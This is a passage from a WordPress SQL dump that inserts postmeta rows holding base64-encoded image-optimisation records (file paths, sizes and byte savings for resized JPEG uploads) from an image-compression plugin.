widGltZSI6MTQ4MzU0OTQ4OSwiaWQiOjE5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozNTQ1LCJ0aW1lIjoxNDgzNTQ5NDkzLCJpZCI6MTk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjMyMTMsInRpbWUiOjE0ODM1NDk0OTYsImlkIjoxOTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxNDY0NywidGltZSI6MTQ4MzU0OTUwMCwiaWQiOjE5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NTcsInRpbWUiOjE0ODM1NDk1MDMsImlkIjoxOTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTQ5NTA2LCJpZCI6MTk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU5NSwidGltZSI6MTQ4MzU0OTUxMCwiaWQiOjE5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTU1MjItV1ktNTUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTUyMi1XWS01NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01NTIyLVdZLTU1LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMjEwLCJ0aW1lIjoxNDgzNTQ5NTEzLCJpZCI6MTk5MH1d'); 
INSERT INTO `wp_postmeta` VALUES (28886, 1989, 'wpfc_optimisation_reduction', '26576'); 
INSERT INTO `wp_postmeta` VALUES (28887, 1989, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTUxOCwiaWQiOiIxOTg5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEwMjMsInRpbWUiOjE0ODM1NDk1MjEsImlkIjoxOTg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzU4OSwidGltZSI6MTQ4MzU0OTUyNCwiaWQiOjE5ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjozMjM3LCJ0aW1lIjoxNDgzNTQ5NTI3LCJpZCI6MTk4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTQ2MzIsInRpbWUiOjE0ODM1NDk1MzEsImlkIjoxOTg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU4LCJ0aW1lIjoxNDgzNTQ5NTM0LCJpZCI6MTk4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0MywidGltZSI6MTQ4MzU0OTUzOCwiaWQiOjE5ODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MTksInRpbWUiOjE0ODM1NDk1NDEsImlkIjoxOTg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MDAzLVctNTUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotNTAwMy1XLTU1LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTUwMDMtVy01NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjI3NSwidGltZSI6MTQ4MzU0OTU0NCwiaWQiOjE5ODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28888, 1988, 'wpfc_optimisation_reduction', '26572'); 
INSERT INTO `wp_postmeta` VALUES (28889, 1988, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTU0OSwiaWQiOiIxOTg4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk5NiwidGltZSI6MTQ4MzU0OTU1MiwiaWQiOjE5ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozNjE5LCJ0aW1lIjoxNDgzNTQ5NTU1LCJpZCI6MTk4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjMyMDcsInRpbWUiOjE0ODM1NDk1NTksImlkIjoxOTg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxNDY3NSwidGltZSI6MTQ4MzU0OTU2MywiaWQiOjE5ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDgsInRpbWUiOjE0ODM1NDk1NjYsImlkIjoxOTg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTMxLCJ0aW1lIjoxNDgzNTQ5NTY5LCJpZCI6MTk4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU0OTU3MiwiaWQiOjE5ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTM1MjItVy02MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zNTIyLVctNjAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotMzUyMi1XLTYwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyMjU1LCJ0aW1lIjoxNDgzNTQ5NTc2LCJpZCI6MTk4OH1d'); 
INSERT INTO `wp_postmeta` VALUES (28890, 1986, 'wpfc_optimisation_reduction', '26389'); 
INSERT INTO `wp_postmeta` VALUES (28891, 1986, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDk1ODAsImlkIjoiMTk4NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDY5LCJ0aW1lIjoxNDgzNTQ5NTg0